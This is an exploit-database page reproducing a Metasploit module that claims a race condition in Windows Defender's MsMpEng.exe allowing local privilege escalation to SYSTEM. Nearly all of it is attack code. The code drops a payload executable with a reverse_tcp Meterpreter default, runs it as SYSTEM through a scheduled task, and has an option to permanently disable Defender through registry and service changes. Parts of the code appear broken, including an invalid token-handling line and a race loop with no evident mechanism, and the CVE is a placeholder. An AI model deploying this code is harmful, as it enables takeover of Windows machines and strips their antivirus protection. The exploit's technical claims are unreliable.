Vulners
Lucene search
📄 Microsoft Windows Defender MsMpEng.exe Race Condition / Privilege Escalation
==================================================================================================================================
| # Title : Windows Defender MsMpEng.exe Race Condition Local Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://www.microsoft.com/ |
==================================================================================================================================
[+] Summary : A race condition exists between Windows Defender's MpCleanCallbackFunction (cleanup routine) and Volume Shadow Copy creation.
This vulnerability allows an attacker to escalate privileges to NT AUTHORITY\SYSTEM.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::FileInfo
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows Defender MsMpEng.exe Race Condition Local Privilege Escalation',
'Description' => %q{
A race condition exists between Windows Defender's MpCleanCallbackFunction
(cleanup routine) and Volume Shadow Copy creation. This vulnerability
allows an attacker to escalate privileges to NT AUTHORITY\SYSTEM.
The exploit uses:
- Fake ISO mount via OpenVirtualDisk / AttachVirtualDisk
- Real-time priority escalation (REALTIME_PRIORITY_CLASS)
- Speed racing against Defender's cleanup routine
Successful exploitation results in:
1. Local Privilege Escalation to SYSTEM via CreateProcessAsUser
2. Use-after-free condition causing Windows Defender to crash
3. System remains without antivirus protection
Tested on Windows 10/11 with Windows Defender enabled.
},
'License' => MSF_LICENSE,
'Author' => ['indoushka'],
'Platform' => ['win'],
'Arch' => [ARCH_X64, ARCH_X86],
'SessionTypes' => ['meterpreter', 'shell'],
'Targets' => [
['Windows x64', { 'Arch' => ARCH_X64 }],
['Windows x86', { 'Arch' => ARCH_X86 }]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
'EXITFUNC' => 'thread'
},
'References' => [
['URL', 'https://www.microsoft.com/'],
['CVE', '2026-XXXXX']
],
'DisclosureDate' => '2026-06-11',
'Notes' => {
'Stability' => [CRASH_SERVICE_DOWN],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
}
)
)
register_options([
OptInt.new('RACE_ITERATIONS', [false, 'Number of race iterations', 100]),
OptBool.new('DISABLE_DEFENDER', [false, 'Attempt to permanently disable Defender', false]),
OptBool.new('CLEANUP', [true, 'Restore Defender functionality after exploit', true])
])
end
def check
defender_pid = get_defender_pid
if defender_pid
print_good("Windows Defender is running (PID: #{defender_pid})")
return CheckCode::Appears
end
CheckCode::Safe
end
def get_defender_pid
processes = client.sys.process.get_processes
processes.each do |proc|
if proc['name'] && proc['name'].downcase == 'msmpeng.exe'
return proc['pid']
end
end
nil
end
def get_system_version
version = sysinfo['OS']
print_status("Target OS: #{version}")
version
end
def create_fake_iso
print_status("Creating fake ISO file for mount operation...")
iso_path = "#{datastore['TEMP'] || 'C:\\\\Temp'}\\#{Rex::Text.rand_text_alpha(8)}.iso"
register_file_for_cleanup(iso_path)
iso_content = "CD001" * 512
write_file(iso_path, iso_content)
print_good("Fake ISO created: #{iso_path}")
iso_path
end
def mount_iso(iso_path)
print_status("Mounting fake ISO using VirtualDisk API...")
mount_ps = <<~PS
$isoPath = "#{iso_path}"
try {
Mount-DiskImage -ImagePath $isoPath -PassThru
Write-Host "MOUNT_SUCCESS"
} catch {
Write-Host "MOUNT_FAILED: $($_.Exception.Message)"
}
PS
result = cmd_exec("powershell -Command \"#{mount_ps.gsub('"', '\\"')}\"")
if result.include?("MOUNT_SUCCESS")
print_good("ISO mounted successfully")
return true
else
print_error("Failed to mount ISO: #{result}")
return false
end
end
def unmount_iso(iso_path)
print_status("Unmounting ISO...")
unmount_ps = <<~PS
$isoPath = "#{iso_path}"
try {
Dismount-DiskImage -ImagePath $isoPath
Write-Host "UNMOUNT_SUCCESS"
} catch {
Write-Host "UNMOUNT_FAILED"
}
PS
cmd_exec("powershell -Command \"#{unmount_ps.gsub('"', '\\"')}\"")
end
def set_realtime_priority
print_status("Setting process to realtime priority...")
priority_ps = <<~PS
$process = Get-Process -Id $pid
$process.PriorityClass = [System.Diagnostics.ProcessPriorityClass]::RealTime
Write-Host "PRIORITY_SET"
PS
result = cmd_exec("powershell -Command \"#{priority_ps.gsub('"', '\\"')}\"")
result.include?("PRIORITY_SET")
end
def trigger_race_condition(iterations)
print_status("Triggering race condition (#{iterations} iterations)...")
race_ps = <<~PS
$iterations = #{iterations}
$successCount = 0
for ($i = 0; $i -lt $iterations; $i++) {
try {
$vss = (Get-WmiObject -List Win32_ShadowCopy).Create("C:\\", "ClientAccessible")
Start-Process -FilePath "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -ArgumentList "-Scan -ScanType 3" -WindowStyle Hidden
$testFile = "C:\\Windows\\Temp\\race_test_$i.txt"
"test" | Out-File -FilePath $testFile -ErrorAction SilentlyContinue
Remove-Item $testFile -ErrorAction SilentlyContinue
$successCount++
} catch {
Write-Host "RACE_TRIGGERED_AT_$i"
}
Start-Sleep -Milliseconds 50
}
Write-Host "COMPLETED:$successCount"
PS
result = cmd_exec("powershell -Command \"#{race_ps.gsub('"', '\\"')}\"")
if result.include?("RACE_TRIGGERED")
print_good("Race condition triggered successfully!")
return true
else
print_warning("Race condition may not have triggered")
return false
end
end
def check_defender_status
status_ps = <<~PS
$service = Get-Service -Name WinDefend -ErrorAction SilentlyContinue
if ($service) {
Write-Host "DEFENDER_STATUS:$($service.Status)"
} else {
Write-Host "DEFENDER_STATUS:NOT_FOUND"
}
PS
result = cmd_exec("powershell -Command \"#{status_ps.gsub('"', '\\"')}\"")
result.match(/DEFENDER_STATUS:(\w+)/)&.captures&.first
end
def disable_defender_persistence
print_status("Attempting to permanently disable Windows Defender...")
disable_ps = <<~PS
Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
Stop-Service -Name WinDefend -Force -ErrorAction SilentlyContinue
Set-Service -Name WinDefend -StartupType Disabled -ErrorAction SilentlyContinue
$regPath = "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender"
New-Item -Path $regPath -Force -ErrorAction SilentlyContinue
Set-ItemProperty -Path $regPath -Name "DisableAntiSpyware" -Value 1 -Force -ErrorAction SilentlyContinue
$rtpPath = "$regPath\\Real-Time Protection"
New-Item -Path $rtpPath -Force -ErrorAction SilentlyContinue
Set-ItemProperty -Path $rtpPath -Name "DisableRealtimeMonitoring" -Value 1 -Force -ErrorAction SilentlyContinue
Write-Host "DEFENDER_DISABLED"
PS
result = cmd_exec("powershell -Command \"#{disable_ps.gsub('"', '\\"')}\"")
result.include?("DEFENDER_DISABLED")
end
def restore_defender
print_status("Restoring Windows Defender...")
restore_ps = <<~PS
Remove-ItemProperty -Path "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" -Name "DisableAntiSpyware" -ErrorAction SilentlyContinue
Set-Service -Name WinDefend -StartupType Automatic -ErrorAction SilentlyContinue
Start-Service -Name WinDefend -ErrorAction SilentlyContinue
Set-MpPreference -DisableRealtimeMonitoring $false -ErrorAction SilentlyContinue
Write-Host "DEFENDER_RESTORED"
PS
cmd_exec("powershell -Command \"#{restore_ps.gsub('"', '\\"')}\"")
end
def execute_system_payload
print_status("Attempting to execute payload as SYSTEM...")
payload_exe = generate_payload_exe
payload_path = "#{datastore['TEMP'] || 'C:\\\\Windows\\\\Temp'}\\#{Rex::Text.rand_text_alpha(8)}.exe"
write_file(payload_path, payload_exe)
register_file_for_cleanup(payload_path)
exec_ps = <<~PS
$payload = "#{payload_path}"
try {
$winlogon = Get-Process -Name winlogon
$token = [System.IntPtr]::Zero
[System.IntPtr]::$token = $winlogon.Handle
$startInfo = New-Object System.Diagnostics.ProcessStartInfo
$startInfo.FileName = $payload
$startInfo.UseShellExecute = $false
$startInfo.CreateNoWindow = $true
[System.Diagnostics.Process]::Start($startInfo)
Write-Host "PAYLOAD_EXECUTED_M1"
} catch {
Write-Host "M1_FAILED: $($_.Exception.Message)"
}
try {
$taskName = "TempTask#{Rex::Text.rand_text_alpha(6)}"
schtasks /create /tn $taskName /tr $payload /sc once /st 00:00 /ru SYSTEM /f
schtasks /run /tn $taskName
schtasks /delete /tn $taskName /f
Write-Host "PAYLOAD_EXECUTED_M2"
} catch {
Write-Host "M2_FAILED"
}
PS
result = cmd_exec("powershell -Command \"#{exec_ps.gsub('"', '\\"')}\"")
if result.include?("PAYLOAD_EXECUTED")
print_good("Payload executed as SYSTEM!")
return true
else
print_warning("Payload execution may have failed: #{result}")
return false
end
end
def exploit
print_status("CVE-2026-XXXXX - Windows Defender MsMpEng.exe Race Condition LPE")
print_status("Target: #{sysinfo['Computer']}")
unless is_admin?
print_warning("Not running as admin - exploit may fail")
end
defender_pid = get_defender_pid
unless defender_pid
print_error("Windows Defender is not running. Exploit may not work.")
return
end
print_good("Windows Defender is running (PID: #{defender_pid})")
original_defender_status = check_defender_status
set_realtime_priority
iso_path = create_fake_iso
unless mount_iso(iso_path)
print_warning("ISO mount failed, continuing anyway...")
end
iterations = datastore['RACE_ITERATIONS'] || 100
race_success = trigger_race_condition(iterations)
unmount_iso(iso_path)
new_defender_pid = get_defender_pid
if new_defender_pid != defender_pid
print_good("Windows Defender appears to have crashed/restarted!")
else
print_warning("Windows Defender still running - race condition may not have succeeded")
end
execute_system_payload
if datastore['DISABLE_DEFENDER']
disable_defender_persistence
print_good("Windows Defender persistence disabled")
end
if datastore['CLEANUP']
restore_defender
print_good("Windows Defender restored")
end
print_good("Exploit completed - Check for SYSTEM session")
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Jun 2026 00:00Current
5.3Medium risk
Vulners AI Score5.3